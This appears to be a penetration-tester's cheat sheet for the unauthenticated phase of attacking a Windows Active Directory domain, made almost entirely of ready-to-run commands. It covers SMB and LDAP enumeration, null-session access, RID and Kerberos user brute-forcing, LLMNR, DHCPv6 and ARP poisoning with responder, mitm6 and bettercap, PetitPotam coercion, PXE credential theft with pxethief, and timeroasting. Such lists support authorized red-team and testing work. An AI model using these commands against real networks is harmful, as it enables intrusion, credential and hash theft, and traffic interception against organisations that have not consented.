Scan network Vulnerable host

  • nxc smb <ip_range>
  • nmap -sP -p <ip>
  • nmap -Pn -sV --top-ports 50 --open <ip>
  • nmap -Pn --script smb-vuln* -p139,445 <ip>
  • nmap -Pn -sC -sV -oA <output> <ip>
  • nmap -Pn -sC -sV -p- -oA <output> <ip>
  • nmap -sU -sC -sV -oA <output> <ip>

Find DC IP

  • nmcli dev show <interface>
  • nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>
  • nmap -p 88 --open <ip_range>

Zone transfer

  • dig axfr <domain_name> @<name_server>

Anonymous & Guest access on SMB shares

  • nxc smb <ip_range> -u '' -p ''
  • nxc smb <ip_range> -u 'a' -p ''
  • enum4linux-ng.py -a -u '' -p '' <ip>
  • smbclient -U '%' -L //<ip>

Enumerate LDAP Username

  • nmap -n -sV --script 'ldap*' and not brute -p 389 <dc_ip>
  • ldapsearch -x -H <dc_ip> -s base

Enumerate Users Username

  • nxc smb <dc_ip> --users
  • nxc smb <dc_ip> --rid-brute 10000 # bruteforcing RID
  • net rpc group members 'Domain Users' -W '<domain> -l <ip> -U '%'

Bruteforce users Username

  • kerbrute userenum -d <domain> <userlist>
  • nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm= '<domain>',userdb=<user_list_file>" <dc_ip>

Poisoning poisoning SMB || poisoning LDAP || poisoning HTTP

  • LLMNR / NBTNS / MDNS
    • responder -l <interface>
  • ⚠️ DHCPv6 (IPv6 prefered to IPv4)
    • mitm6 -d <domain>
    • bettercap
  • ⚠️ ARP Poisoning
    • bettercap
    • asreqroast
      • Pcredz -i <interface> -v Hash found ASREQ

Coerce Coerce SMB

  • Unauthenticated PetitPotam (CVE-2022-26925) @CVE@
    • petitpotam.py -d <domain> <listener> <target>

PXE

  • no password Credentials (NAA account)
    • pxethief.py 1
    • pxethief.py 2 <distribution_point_ip>
  • password protected PXE Hash
    • tftp -i <dp_ip> GET "\xxx\boot.var"
    • pxethief.py 5 '\xxx\boot.var'

TimeRoasting timeroast hash

  • timeroast.py <dc_ip> -o <output_log>